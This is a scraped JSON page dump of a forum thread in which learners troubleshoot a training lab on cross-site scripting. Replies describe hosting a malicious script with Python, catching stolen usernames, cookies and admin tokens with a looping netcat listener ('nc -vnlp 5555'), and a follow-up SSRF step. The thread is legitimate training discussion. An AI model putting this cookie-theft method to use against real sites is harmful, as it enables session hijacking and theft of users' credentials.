Exploitation","moderationData":{"__ref":"ModerationData:moderation_data:546"},"body":"

NyePriorThanks for the reply.  I also tried this method. I used ip address from ifconfig, local host (127.0.0.1), and 0.0.0.0 got the same result.  If that were the case, how am I able to open the js file in the browser using http://0.0.0.0:8080/script.js url?  The JS is executing when I expose the vulnerability and I can see the request happen in netcat...  Therefore I feel confident that the issue is inside the js file or with the /admin/token itself.  I have tried the python method and the netcat method.   The /admin/token endpoint gets me a 302 permanent redirect.  As a python full stack developer w/ a good understanding of accessing local host as a local web server... I think I'm missing something else or not understanding the flow completely.

","body@stripHtml({\"removeProcessingText\":false,\"removeSpoilerMarkup\":false,\"removeTocMarkup\":false,\"truncateLength\":200})@stringLength":"213","kudosSumWeight":0,"repliesCount":0,"postTime":"2024-09-24T05:29:28.375-07:00","lastPublishTime":"2024-09-24T05:30:20.950-07:00","metrics":{"__typename":"MessageMetrics","views":300},"visibilityScope":"PUBLIC","placeholder":false,"originalMessageForPlaceholder":null,"isEscalated":null,"solution":false,"entityType":"FORUM_REPLY","eventPath":"category:help/community:dnvaw96485board:help/message:506/message:546","replies":{"__typename":"MessageConnection","pageInfo":{"__typename":"PageInfo","hasNextPage":false,"endCursor":null,"hasPreviousPage":false,"startCursor":null},"edges":[]},"attachments":{"__typename":"AttachmentConnection","edges":[],"pageInfo":{"__typename":"PageInfo","hasNextPage":false,"endCursor":null,"hasPreviousPage":false,"startCursor":null}},"customFields":[]},"ModerationData:moderation_data:547":{"__typename":"ModerationData","id":"moderation_data:547","status":"APPROVED","rejectReason":null,"isReportedAbuse":false,"rejectUser":null,"rejectTime":null,"rejectActorType":"member"},"ForumReplyMessage:message:547":{"__typename":"ForumReplyMessage","uid":547,"id":"message:547","revisionNum":1,"author":{"__ref":"User:user:209"},"readOnly":false,"repliesCount":1,"depth":1,"hasGivenKudo":false,"subscribed":false,"board":{"__ref":"Forum:board:help"},"parent":{"__ref":"ForumTopicMessage:message:506"},"conversation":{"__ref":"Conversation:conversation:506"},"subject":"Re: Cross-Site Scripting: Ep.6 – Further Exploitation","moderationData":{"__ref":"ModerationData:moderation_data:547"},"body":"

They key is knowing that you have to use python to host the remote .js file in parallel with netcat to listen for the response of the XSS malicious scripts.  Additionally, there are two steps to expose the data. One exposes the username and token cookie (question 1&2) in the query parameters.  The other displays the token in the html body.  The example code snippets work with VERY minor modifications.  One thing I did based on feedback from a peer, was to wrap Netcat in a look to keep it active in terminal for subsequent requests.

","body@stripHtml({\"removeProcessingText\":false,\"removeSpoilerMarkup\":false,\"removeTocMarkup\":false,\"truncateLength\":200})@stringLength":"208","kudosSumWeight":0,"postTime":"2024-09-24T08:56:53.581-07:00","lastPublishTime":"2024-09-24T08:56:53.581-07:00","metrics":{"__typename":"MessageMetrics","views":294},"visibilityScope":"PUBLIC","placeholder":false,"originalMessageForPlaceholder":null,"isEscalated":null,"solution":false,"entityType":"FORUM_REPLY","eventPath":"category:help/community:dnvaw96485board:help/message:506/message:547","replies":{"__typename":"MessageConnection","pageInfo":{"__typename":"PageInfo","hasNextPage":false,"endCursor":null,"hasPreviousPage":false,"startCursor":null},"edges":[{"__typename":"MessageEdge","cursor":"MjUuM3wyLjF8b3wzfDE0OjAsMzk6MXwx","node":{"__ref":"ForumReplyMessage:message:555"}}]},"attachments":{"__typename":"AttachmentConnection","edges":[],"pageInfo":{"__typename":"PageInfo","hasNextPage":false,"endCursor":null,"hasPreviousPage":false,"startCursor":null}},"customFields":[]},"ModerationData:moderation_data:555":{"__typename":"ModerationData","id":"moderation_data:555","status":"APPROVED","rejectReason":null,"isReportedAbuse":false,"rejectUser":null,"rejectTime":null,"rejectActorType":"member"},"ForumReplyMessage:message:555":{"__typename":"ForumReplyMessage","author":{"__ref":"User:user:218"},"id":"message:555","revisionNum":1,"uid":555,"depth":2,"hasGivenKudo":false,"subscribed":false,"board":{"__ref":"Forum:board:help"},"parent":{"__ref":"ForumReplyMessage:message:547"},"conversation":{"__ref":"Conversation:conversation:506"},"subject":"Re: Cross-Site Scripting: Ep.6 – Further Exploitation","moderationData":{"__ref":"ModerationData:moderation_data:555"},"body":"

Agreed.

Run XSS exploit ensure your script allows this to loop with NC listening. Name and cookie given instantly. Then i hosted the payload using http.server and conducted SSRF this time using a different port number and NC. This dropped the full body then a cyber chef URLDecode the answer is available. 
The actual script doesn’t need much work. 

","body@stripHtml({\"removeProcessingText\":false,\"removeSpoilerMarkup\":false,\"removeTocMarkup\":false,\"truncateLength\":200})@stringLength":"203","kudosSumWeight":1,"repliesCount":0,"postTime":"2024-09-24T13:51:16.691-07:00","lastPublishTime":"2024-09-24T13:51:16.691-07:00","metrics":{"__typename":"MessageMetrics","views":274},"visibilityScope":"PUBLIC","placeholder":false,"originalMessageForPlaceholder":null,"isEscalated":null,"solution":false,"entityType":"FORUM_REPLY","eventPath":"category:help/community:dnvaw96485board:help/message:506/message:555","replies":{"__typename":"MessageConnection","pageInfo":{"__typename":"PageInfo","hasNextPage":false,"endCursor":null,"hasPreviousPage":false,"startCursor":null},"edges":[]},"attachments":{"__typename":"AttachmentConnection","edges":[],"pageInfo":{"__typename":"PageInfo","hasNextPage":false,"endCursor":null,"hasPreviousPage":false,"startCursor":null}},"customFields":[]},"User:user:233":{"__typename":"User","id":"user:233","uid":233,"login":"johndoe321","biography":null,"registrationData":{"__typename":"RegistrationData","status":null,"registrationTime":"2024-09-25T22:50:29.951-07:00"},"deleted":false,"email":"","avatar":{"__typename":"UserAvatar","url":"https://community.immersivelabs.com/t5/s/dnvaw96485/m_assets/avatars/default/avatar-7.svg?time=0"},"rank":{"__ref":"Rank:rank:8"},"entityType":"USER","eventPath":"community:dnvaw96485/user:233"},"ModerationData:moderation_data:579":{"__typename":"ModerationData","id":"moderation_data:579","status":"APPROVED","rejectReason":null,"isReportedAbuse":false,"rejectUser":null,"rejectTime":null,"rejectActorType":"member"},"ForumReplyMessage:message:579":{"__typename":"ForumReplyMessage","uid":579,"id":"message:579","revisionNum":2,"author":{"__ref":"User:user:233"},"readOnly":false,"repliesCount":2,"depth":1,"hasGivenKudo":false,"subscribed":false,"board":{"__ref":"Forum:board:help"},"parent":{"__ref":"ForumTopicMessage:message:506"},"conversation":{"__ref":"Conversation:conversation:506"},"subject":"Re: Cross-Site Scripting: Ep.6 – Further Exploitation","moderationData":{"__ref":"ModerationData:moderation_data:579"},"body":"

I have done the following so far:

  1. Identify the wildcard cycles employee user ID & token
  2. Host the http server using the python module (port 8080)
  3. Create a script.js file w/ the code provided in the Briefing section w/ the XMLHttpRequest object's open method's url parameter set to /admin/token instead of /users/data (tried setting this many different things including http://{ip of employee machine}/admin/token, /{employee id}/{token} - 
  4. All the while having the nc -vnlp 5555 looping in an infinite while loop

On the terminal monitoring the http server activity, I see a GET /script.js every ~60s or so, and each time that happens, the nc listening on 5555 shows the same keepalive traffic w/ the same user ID & token information, but not the contents of the actual /admin/token page... 

I have a feeling I am missing something in item 3 listed above - something not right w/ how i have the script.js payload set up... 

Been stuck on this for way longer than I care to, any guidance would be greatly appreciated. 

","body@stripHtml({\"removeProcessingText\":false,\"removeSpoilerMarkup\":false,\"removeTocMarkup\":false,\"truncateLength\":200})@stringLength":"207","kudosSumWeight":0,"postTime":"2024-09-26T10:14:43.026-07:00","lastPublishTime":"2024-09-26T10:15:22.216-07:00","metrics":{"__typename":"MessageMetrics","views":186},"visibilityScope":"PUBLIC","placeholder":false,"originalMessageForPlaceholder":null,"isEscalated":null,"solution":false,"entityType":"FORUM_REPLY","eventPath":"category:help/community:dnvaw96485board:help/message:506/message:579","replies":{"__typename":"MessageConnection","pageInfo":{"__typename":"PageInfo","hasNextPage":false,"endCursor":null,"hasPreviousPage":false,"startCursor":null},"edges":[{"__typename":"MessageEdge","cursor":"MjUuM3wyLjF8b3wzfDE0OjAsMzk6MXwx","node":{"__ref":"AcceptedSolutionMessage:message:583"}}]},"attachments":{"__typename":"AttachmentConnection","edges":[],"pageInfo":{"__typename":"PageInfo","hasNextPage":false,"endCursor":null,"hasPreviousPage":false,"startCursor":null}},"customFields":[]},"ModerationData:moderation_data:583":{"__typename":"ModerationData","id":"moderation_data:583","status":"APPROVED","rejectReason":null,"isReportedAbuse":false,"rejectUser":null,"rejectTime":null,"rejectActorType":"member"},"AcceptedSolutionMessage:message:583":{"__typename":"AcceptedSolutionMessage","uid":583,"id":"message:583","revisionNum":2,"author":{"__ref":"User:user:218"},"readOnly":false,"repliesCount":1,"depth":2,"hasGivenKudo":false,"subscribed":false,"board":{"__ref":"Forum:board:help"},"parent":{"__ref":"ForumReplyMessage:message:579"},"conversation":{"__ref":"Conversation:conversation:506"},"subject":"Re: Cross-Site Scripting: Ep.6 – Further Exploitation","moderationData":{"__ref":"ModerationData:moderation_data:583"},"body":"

johndoe321I changed the script to a different port to the one being bombarded and did another NC listener on that different port. Roled right in. 

","body@stripHtml({\"removeProcessingText\":false,\"removeSpoilerMarkup\":false,\"removeTocMarkup\":false,\"truncateLength\":200})@stringLength":"153","kudosSumWeight":1,"postTime":"2024-09-26T11:36:07.131-07:00","lastPublishTime":"2024-09-26T11:36:36.121-07:00","solution":true,"metrics":{"__typename":"MessageMetrics","views":357},"visibilityScope":"PUBLIC","placeholder":false,"originalMessageForPlaceholder":null,"isEscalated":null,"entityType":"FORUM_REPLY","eventPath":"category:help/community:dnvaw96485board:help/message:506/message:583","replies":{"__typename":"MessageConnection","pageInfo":{"__typename":"PageInfo","hasNextPage":false,"endCursor":null,"hasPreviousPage":false,"startCursor":null},"edges":[{"__typename":"MessageEdge","cursor":"MjUuM3wyLjF8b3wxfDE0OjAsMzk6MXwx","node":{"__ref":"ForumReplyMessage:message:585"}}]},"body@stripHtml({\"removeProcessingText\":true,\"removeSpoilerMarkup\":true,\"removeTocMarkup\":true,\"truncateLength\":200})@stringLength":"153","images":{"__typename":"AssociatedImageConnection","edges":[],"totalCount":0,"pageInfo":{"__typename":"PageInfo","hasNextPage":false,"endCursor":null,"hasPreviousPage":false,"startCursor":null}},"attachments":{"__typename":"AttachmentConnection","pageInfo":{"__typename":"PageInfo","hasNextPage":false,"endCursor":null,"hasPreviousPage":false,"startCursor":null},"edges":[]},"videos":{"__typename":"VideoConnection","edges":[],"totalCount":0,"pageInfo":{"__typename":"PageInfo","hasNextPage":false,"endCursor":null,"hasPreviousPage":false,"startCursor":null}},"customFields":[]},"ModerationData:moderation_data:585":{"__typename":"ModerationData","id":"moderation_data:585","status":"APPROVED","rejectReason":null,"isReportedAbuse":false,"rejectUser":null,"rejectTime":null,"rejectActorType":"member"},"ForumReplyMessage:message:585":{"__typename":"ForumReplyMessage","author":{"__ref":"User:user:233"},"id":"message:585","revisionNum":1,"uid":585,"depth":3,"hasGivenKudo":false,"subscribed":false,"board":{"__ref":"Forum:board:help"},"parent":{"__ref":"AcceptedSolutionMessage:message:583"},"conversation":{"__ref":"Conversation:conversation:506"},"subject":"Re: Cross-Site Scripting: Ep.6 – Further Exploitation","moderationData":{"__ref":"ModerationData:moderation_data:585"},"body":"

Wow that did it instantly, thank you CyberSharpe!! Guess 5555 is already in-use/bound to the first exploit... 

","body@stripHtml({\"removeProcessingText\":false,\"removeSpoilerMarkup\":false,\"removeTocMarkup\":false,\"truncateLength\":200})@stringLength":"117","kudosSumWeight":1,"repliesCount":0,"postTime":"2024-09-26T12:41:23.499-07:00","lastPublishTime":"2024-09-26T12:41:23.499-07:00","metrics":{"__typename":"MessageMetrics","views":197},"visibilityScope":"PUBLIC","placeholder":false,"originalMessageForPlaceholder":null,"isEscalated":null,"solution":false,"entityType":"FORUM_REPLY","eventPath":"category:help/community:dnvaw96485board:help/message:506/message:585","attachments":{"__typename":"AttachmentConnection","edges":[],"pageInfo":{"__typename":"PageInfo","hasNextPage":false,"endCursor":null,"hasPreviousPage":false,"startCursor":null}},"customFields":[]},"User:user:2":{"__typename":"User","id":"user:2","uid":2,"login":"TillyCorless","biography":null,"registrationData":{"__typename":"RegistrationData","status":null,"registrationTime":"2024-05-24T05:46:29.664-07:00"},"deleted":false,"email":"","avatar":{"__typename":"UserAvatar","url":"https://community.immersivelabs.com/t5/s/dnvaw96485/images/dS0yLUVFRzh2WA?image-coordinates=867%2C1707%2C2734%2C3574"},"rank":{"__ref":"Rank:rank:1"},"entityType":"USER","eventPath":"community:dnvaw96485/user:2"},"ModerationData:moderation_data:589":{"__typename":"ModerationData","id":"moderation_data:589","status":"APPROVED","rejectReason":null,"isReportedAbuse":false,"rejectUser":null,"rejectTime":null,"rejectActorType":null},"ForumReplyMessage:message:589":{"__typename":"ForumReplyMessage","author":{"__ref":"User:user:2"},"id":"message:589","revisionNum":1,"uid":589,"depth":1,"hasGivenKudo":false,"subscribed":false,"board":{"__ref":"Forum:board:help"},"parent":{"__ref":"ForumTopicMessage:message:506"},"conversation":{"__ref":"Conversation:conversation:506"},"subject":"Re: Cross-Site Scripting: Ep.6 – Further Exploitation","moderationData":{"__ref":"ModerationData:moderation_data:589"},"body":"

Hey johndoe321 I'm pleased that CyberSharpe was able to help you here! If you found their reply useful, please don't forget to mark it as a Solution ✅

\n

Marking a reply as a solution helps other community members to find answers to questions that they may also have. It also confirms to your fellow community members that their reply was helpful! You can accept more than one reply as a solution.

","body@stripHtml({\"removeProcessingText\":false,\"removeSpoilerMarkup\":false,\"removeTocMarkup\":false,\"truncateLength\":200})@stringLength":"203","kudosSumWeight":0,"repliesCount":0,"postTime":"2024-09-27T01:15:26.324-07:00","lastPublishTime":"2024-09-27T01:15:26.324-07:00","metrics":{"__typename":"MessageMetrics","views":155},"visibilityScope":"PUBLIC","placeholder":false,"originalMessageForPlaceholder":null,"isEscalated":null,"solution":false,"entityType":"FORUM_REPLY","eventPath":"category:help/community:dnvaw96485board:help/message:506/message:589","replies":{"__typename":"MessageConnection","pageInfo":{"__typename":"PageInfo","hasNextPage":false,"endCursor":null,"hasPreviousPage":false,"startCursor":null},"edges":[]},"customFields":[],"attachments":{"__typename":"AttachmentConnection","edges":[],"pageInfo":{"__typename":"PageInfo","hasNextPage":false,"endCursor":null,"hasPreviousPage":false,"startCursor":null}}},"ModerationData:moderation_data:711":{"__typename":"ModerationData","id":"moderation_data:711","status":"APPROVED","rejectReason":null,"isReportedAbuse":false,"rejectUser":null,"rejectTime":null,"rejectActorType":null},"ForumReplyMessage:message:711":{"__typename":"ForumReplyMessage","author":{"__ref":"User:user:5"},"id":"message:711","revisionNum":1,"uid":711,"depth":1,"hasGivenKudo":false,"subscribed":false,"board":{"__ref":"Forum:board:help"},"parent":{"__ref":"ForumTopicMessage:message:506"},"conversation":{"__ref":"Conversation:conversation:506"},"subject":"Re: Cross-Site Scripting: Ep.6 – Further Exploitation","moderationData":{"__ref":"ModerationData:moderation_data:711"},"body":"","body@stripHtml({\"removeProcessingText\":false,\"removeSpoilerMarkup\":false,\"removeTocMarkup\":false,\"truncateLength\":200})@stringLength":"0","kudosSumWeight":0,"repliesCount":0,"postTime":"2024-10-10T07:16:41.480-07:00","lastPublishTime":"2024-10-10T07:16:41.480-07:00","metrics":{"__typename":"MessageMetrics","views":0},"visibilityScope":"PUBLIC","placeholder":true,"originalMessageForPlaceholder":{"__ref":"ForumTopicMessage:message:662"},"isEscalated":null,"solution":false,"entityType":"FORUM_REPLY","eventPath":"category:help/community:dnvaw96485board:help/message:506/message:711","replies":{"__typename":"MessageConnection","pageInfo":{"__typename":"PageInfo","hasNextPage":false,"endCursor":null,"hasPreviousPage":false,"startCursor":null},"edges":[]}},"QueryVariables:MessageSolutions":{"__typename":"QueryVariables","id":"MessageSolutions","value":{"first":10,"constraints":{"topicId":{"eq":"message:506"},"solution":{"eq":true}},"sorts":{"postTime":{"direction":"ASC"}},"useAvatar":true,"useAuthorLogin":true,"useAuthorRank":false,"useBody":true,"useKudosCount":false,"useTimeToRead":false,"useMedia":true,"useRepliesCount":false,"useSearchSnippet":false,"useAcceptedSolutionButton":true,"useSolvedBadge":false,"useAttachments":true,"useTags":false,"useUserHoverCard":false,"useNodeHoverCard":false,"usePreviewSubjectModal":false,"useMessageStatus":false}},"CachedAsset:text:en_US-components/community/Navbar-1746024986000":{"__typename":"CachedAsset","id":"text:en_US-components/community/Navbar-1746024986000","value":{"community":"Community Home","inbox":"Inbox","manageContent":"Manage Content","tos":"Terms of Service","forgotPassword":"Forgot Password","themeEditor":"Theme Editor","edit":"Edit Navigation Bar","skipContent":"Skip to content","migrated-link-9":"Events","external-1":"Help Centre","migrated-link-7":"Customer Stories Blog","migrated-link-8":"SME Blog","customer-blog":"Product Updates","migrated-link-1":"Community Blog","the-human-connection-blog":"Human Connection Blog","migrated-link-2":"Community Forum","Common-external-link":"Community Challenge","migrated-link-0":"Community","migrated-link-5":"Customer Blog","migrated-link-6":"Cyber Threat Research Blog","migrated-link-3":"Help","migrated-link-4":"Learn","cyber-countdown-link":"Cyber Countdown","migrated-link-14":"Cyber Million Blog","migrated-link-15":"Cyber Million Website","migrated-link-12":"Cyber Million","migrated-link-13":"Ask a Question","welcome":"Get Started","external-3":"Answer Questions","external-2":"Answer Questions","migrated-link-10":"Customer Events","migrated-link-11":"Community Events","cybertrust-massachusetts-link":"CyberTrust Massachusetts","get-started-link":"Get Started","help":"Ask a Question","external":"Immersive Blog"},"localOverride":false},"CachedAsset:text:en_US-components/community/NavbarHamburgerDropdown-1746024986000":{"__typename":"CachedAsset","id":"text:en_US-components/community/NavbarHamburgerDropdown-1746024986000","value":{"hamburgerLabel":"Side Menu"},"localOverride":false},"CachedAsset:text:en_US-components/community/BrandLogo-1746024986000":{"__typename":"CachedAsset","id":"text:en_US-components/community/BrandLogo-1746024986000","value":{"logoAlt":"Khoros","themeLogoAlt":"Brand Logo"},"localOverride":false},"CachedAsset:text:en_US-components/community/NavbarTextLinks-1746024986000":{"__typename":"CachedAsset","id":"text:en_US-components/community/NavbarTextLinks-1746024986000","value":{"more":"More"},"localOverride":false},"CachedAsset:text:en_US-components/search/SpotlightSearchIcon-1746024986000":{"__typename":"CachedAsset","id":"text:en_US-components/search/SpotlightSearchIcon-1746024986000","value":{"search":"Search"},"localOverride":false},"CachedAsset:text:en_US-components/authentication/AuthenticationLink-1746024986000":{"__typename":"CachedAsset","id":"text:en_US-components/authentication/AuthenticationLink-1746024986000","value":{"title.login":"Sign In","title.registration":"Register","title.forgotPassword":"Forgot Password","title.multiAuthLogin":"Sign In"},"localOverride":false},"CachedAsset:text:en_US-components/nodes/NodeLink-1746024986000":{"__typename":"CachedAsset","id":"text:en_US-components/nodes/NodeLink-1746024986000","value":{"place":"Place {name}"},"localOverride":false},"CachedAsset:text:en_US-components/messages/EscalatedMessageBanner-1746024986000":{"__typename":"CachedAsset","id":"text:en_US-components/messages/EscalatedMessageBanner-1746024986000","value":{"escalationMessage":"Escalated to Salesforce by {username} on {date}","viewDetails":"View Details","modalTitle":"Case Details","escalatedBy":"Escalated by: ","escalatedOn":"Escalated on: ","caseNumber":"Case Number: ","status":"Status: ","lastUpdateDate":"Last Update: ","automaticEscalation":"automatic escalation","anonymous":"Anonymous"},"localOverride":false},"CachedAsset:text:en_US-components/users/UserLink-1746024986000":{"__typename":"CachedAsset","id":"text:en_US-components/users/UserLink-1746024986000","value":{"authorName":"View Profile: {author}","anonymous":"Anonymous"},"localOverride":false},"CachedAsset:text:en_US-shared/client/components/users/UserRank-1746024986000":{"__typename":"CachedAsset","id":"text:en_US-shared/client/components/users/UserRank-1746024986000","value":{"rankName":"{rankName}","userRank":"Author rank {rankName}"},"localOverride":false},"CachedAsset:text:en_US-components/messages/MessageTime-1746024986000":{"__typename":"CachedAsset","id":"text:en_US-components/messages/MessageTime-1746024986000","value":{"postTime":"Published: {time}","lastPublishTime":"Last Update: {time}","conversation.lastPostingActivityTime":"Last posting activity time: {time}","conversation.lastPostTime":"Last post time: {time}","moderationData.rejectTime":"Rejected time: {time}"},"localOverride":false},"CachedAsset:text:en_US-components/messages/MessageSolvedBadge-1746024986000":{"__typename":"CachedAsset","id":"text:en_US-components/messages/MessageSolvedBadge-1746024986000","value":{"solved":"Solved"},"localOverride":false},"CachedAsset:text:en_US-components/messages/MessageSubject-1746024986000":{"__typename":"CachedAsset","id":"text:en_US-components/messages/MessageSubject-1746024986000","value":{"noSubject":"(no subject)"},"localOverride":false},"CachedAsset:text:en_US-components/messages/MessageBody-1746024986000":{"__typename":"CachedAsset","id":"text:en_US-components/messages/MessageBody-1746024986000","value":{"showMessageBody":"Show More","mentionsErrorTitle":"{mentionsType, select, board {Board} user {User} message {Message} other {}} No Longer Available","mentionsErrorMessage":"The {mentionsType} you are trying to view has been removed from the community.","videoProcessing":"Video is being processed. Please try again in a few minutes.","bannerTitle":"Video provider requires cookies to play the video. Accept to continue or {url} it directly on the provider's site.","buttonTitle":"Accept","urlText":"watch"},"localOverride":false},"CachedAsset:text:en_US-components/messages/MessageCustomFields-1746024986000":{"__typename":"CachedAsset","id":"text:en_US-components/messages/MessageCustomFields-1746024986000","value":{"CustomField.default.label":"Value of {name}"},"localOverride":false},"CachedAsset:text:en_US-shared/client/components/common/QueryHandler-1746024986000":{"__typename":"CachedAsset","id":"text:en_US-shared/client/components/common/QueryHandler-1746024986000","value":{"title":"Query Handler"},"localOverride":false},"CachedAsset:text:en_US-components/messages/MessageReplyButton-1746024986000":{"__typename":"CachedAsset","id":"text:en_US-components/messages/MessageReplyButton-1746024986000","value":{"repliesCount":"{count}","title":"Reply","title@board:BLOG@message:root":"Comment","title@board:TKB@message:root":"Comment","title@board:IDEA@message:root":"Comment","title@board:OCCASION@message:root":"Comment"},"localOverride":false},"CachedAsset:text:en_US-components/messages/MessageSolutionList-1746024986000":{"__typename":"CachedAsset","id":"text:en_US-components/messages/MessageSolutionList-1746024986000","value":{"emptyDescription":"No has been message solutions yet"},"localOverride":false},"CachedAsset:text:en_US-components/featured/places/AddFeaturedPlacesModal-1746024986000":{"__typename":"CachedAsset","id":"text:en_US-components/featured/places/AddFeaturedPlacesModal-1746024986000","value":{"header":"Edit Featured Places","header.description":"Add, remove, or reorder featured places in this widget{nodeType, select, community{} other{ for {nodeTitle}}}.","PageEditor.header":"Edit Sample Content","PageEditor.header.description":"Add, remove, or reorder sample content to preview how your widget will look.\n\nChanges to sample content here will not be saved or published to any page templates.","AddFeaturedPlacesModal.selectedPlace.label":"Places","AddFeaturedPlacesModal.selectedPlace.placeholder":"Find a place","AddFeaturedPlacesModal.submit":"Save","AddFeaturedPlacesModal.cancel":"Cancel","AddFeaturedPlacesModal.selectedPlace.validate.error":"Select a place","AddFeaturedPlacesModal.selectedPlace.validate.placeLimitCheck.error":"You can feature up to {limit} places","disabledReasonText":"This place has already been added","submitBtn":"Save","previewBtn":"Preview","cancelBtn":"Cancel","failureTitle":"Error - Action Failed","failureMessage":"An unidentified problem occurred while saving featured content. Please try again later.","successTitle":"Success","successMessage":"Widget updated"},"localOverride":false},"CachedAsset:text:en_US-components/featured/places/FeaturedPlacesList-1746024986000":{"__typename":"CachedAsset","id":"text:en_US-components/featured/places/FeaturedPlacesList-1746024986000","value":{"edit":"Edit Featured Places","header":"Featured Places"},"localOverride":false},"CachedAsset:text:en_US-shared/client/components/common/BuildInformation-1746024986000":{"__typename":"CachedAsset","id":"text:en_US-shared/client/components/common/BuildInformation-1746024986000","value":{"buildHash":"Build Hash: {buildHash}","buildNumber":"Build Number: {buildNumber}","buildTime":"Build Time: {buildTime}"},"localOverride":false},"CachedAsset:text:en_US-components/community/KhorosLogo-1746024986000":{"__typename":"CachedAsset","id":"text:en_US-components/community/KhorosLogo-1746024986000","value":{"alt":"Powered By Khoros"},"localOverride":false},"CachedAsset:text:en_US-components/community/NavbarDropdownToggle-1746024986000":{"__typename":"CachedAsset","id":"text:en_US-components/community/NavbarDropdownToggle-1746024986000","value":{"ariaLabelClosed":"Press the down arrow to open the menu"},"localOverride":false},"CachedAsset:text:en_US-shared/client/components/users/UserAvatar-1746024986000":{"__typename":"CachedAsset","id":"text:en_US-shared/client/components/users/UserAvatar-1746024986000","value":{"altText":"{login}'s avatar","altTextGeneric":"User's avatar"},"localOverride":false},"CachedAsset:text:en_US-shared/client/components/ranks/UserRankLabel-1746024986000":{"__typename":"CachedAsset","id":"text:en_US-shared/client/components/ranks/UserRankLabel-1746024986000","value":{"altTitle":"Icon for {rankName} rank"},"localOverride":false},"CachedAsset:text:en_US-components/tags/TagView/TagViewChip-1746024986000":{"__typename":"CachedAsset","id":"text:en_US-components/tags/TagView/TagViewChip-1746024986000","value":{"tagLabelName":"Tag name {tagName}"},"localOverride":false},"CachedAsset:text:en_US-components/messages/AcceptedSolutionButton-1746024986000":{"__typename":"CachedAsset","id":"text:en_US-components/messages/AcceptedSolutionButton-1746024986000","value":{"accept":"Mark as Solution","accepted":"Marked as Solution","errorHeader":"Error!","errorAdd":"There was an error marking as solution.","errorRemove":"There was an error unmarking as solution.","solved":"Solved","topicAlreadySolvedErrorTitle":"Solution Already Exists","topicAlreadySolvedErrorDesc":"Refresh the browser to view the existing solution"},"localOverride":false},"CachedAsset:text:en_US-components/messages/MessageListMenu-1746024986000":{"__typename":"CachedAsset","id":"text:en_US-components/messages/MessageListMenu-1746024986000","value":{"postTimeAsc":"Oldest","postTimeDesc":"Newest","kudosSumWeightAsc":"Least Liked","kudosSumWeightDesc":"Most Liked","sortTitle":"Sort By","sortedBy.item":" { itemName, select, postTimeAsc {Oldest} postTimeDesc {Newest} kudosSumWeightAsc {Least Liked} kudosSumWeightDesc {Most Liked} other {}}"},"localOverride":false},"CachedAsset:text:en_US-shared/client/components/common/Pager/PagerLoadMore-1746024986000":{"__typename":"CachedAsset","id":"text:en_US-shared/client/components/common/Pager/PagerLoadMore-1746024986000","value":{"loadMore":"Show More"},"localOverride":false},"CachedAsset:text:en_US-components/nodes/NodeView/NodeViewCard-1746024986000":{"__typename":"CachedAsset","id":"text:en_US-components/nodes/NodeView/NodeViewCard-1746024986000","value":{"title":"{nodeTitle} ","creationDate":"Created: {creationDate}","ownedBy":"Owned by: {owners}{text}","showOwnerListText":", and {ownersCount} more","unreadCount":"{count} unread","nodeViewDrawerBtn":"Node view drawer for {place}","drawerActionTooltip":"Show category children"},"localOverride":false},"CachedAsset:text:en_US-components/messages/MessageView/MessageViewInline-1746024986000":{"__typename":"CachedAsset","id":"text:en_US-components/messages/MessageView/MessageViewInline-1746024986000","value":{"bylineAuthor":"{bylineAuthor}","bylineBoard":"{bylineBoard}","anonymous":"Anonymous","place":"Place {bylineBoard}","gotoParent":"Go to parent {name}"},"localOverride":false},"CachedAsset:text:en_US-shared/client/components/nodes/NodeTitle-1746024986000":{"__typename":"CachedAsset","id":"text:en_US-shared/client/components/nodes/NodeTitle-1746024986000","value":{"nodeTitle":"{nodeTitle, select, community {Community} other {{nodeTitle}}} "},"localOverride":false}}}},"page":"/forums/ForumMessagePage/ForumMessagePage","query":{"boardId":"help","messageSubject":"cross-site-scripting-ep-6-–-further-exploitation","messageId":"506"},"buildId":"ISAhs0UxT148eG089lpQq","runtimeConfig":{"buildInformationVisible":false,"logLevelApp":"info","logLevelMetrics":"info","openTelemetryClientEnabled":false,"openTelemetryConfigName":"immersivelabs","openTelemetryServiceVersion":"25.3.0","openTelemetryUniverse":"prod","openTelemetryCollector":"http://localhost:4318","openTelemetryRouteChangeAllowedTime":"5000","apolloDevToolsEnabled":false,"inboxMuteWipFeatureEnabled":false},"isFallback":false,"isExperimentalCompile":false,"dynamicIds":["./components/seo/QAPageSchema/QAPageSchema.tsx","./components/community/Navbar/NavbarWidget.tsx","./components/community/Breadcrumb/BreadcrumbWidget.tsx","./components/messages/TopicWithThreadedReplyListWidget/TopicWithThreadedReplyListWidget.tsx","./components/messages/MessageView/MessageViewStandard/MessageViewStandard.tsx","./components/messages/ThreadedReplyList/ThreadedReplyList.tsx","./components/featured/places/FeaturedPlacesWidget/FeaturedPlacesWidget.tsx","./components/messages/RelatedContentWidget/RelatedContentWidget.tsx","./components/messages/MessageListForNodeByRecentActivityWidget/MessageListForNodeByRecentActivityWidget.tsx","./components/community/FooterWidget/FooterWidget.tsx","./components/customComponent/CustomComponent/CustomComponent.tsx","./components/featured/places/AddFeaturedPlacesModal/AddFeaturedPlacesModal.tsx","./components/community/FooterWidgetHelpLink/FooterWidgetHelpLink.tsx","./components/community/KhorosLogo/KhorosLogo.tsx","../shared/client/components/common/List/UnwrappedList/UnwrappedList.tsx","./components/tags/TagView/TagView.tsx","./components/tags/TagView/TagViewChip/TagViewChip.tsx","../shared/client/components/common/List/UnstyledList/UnstyledList.tsx","./components/messages/MessageView/MessageView.tsx","../shared/client/components/common/Pager/PagerLoadMore/PagerLoadMore.tsx","../shared/client/components/common/List/GridList/GridList.tsx","./components/nodes/NodeView/NodeView.tsx","./components/nodes/NodeView/NodeViewCard/NodeViewCard.tsx","./components/messages/MessageView/MessageViewInline/MessageViewInline.tsx","../shared/client/components/common/List/ListGroup/ListGroup.tsx","./components/customComponent/CustomComponentContent/TemplateContent.tsx"],"appGip":true,"scriptLoader":[]}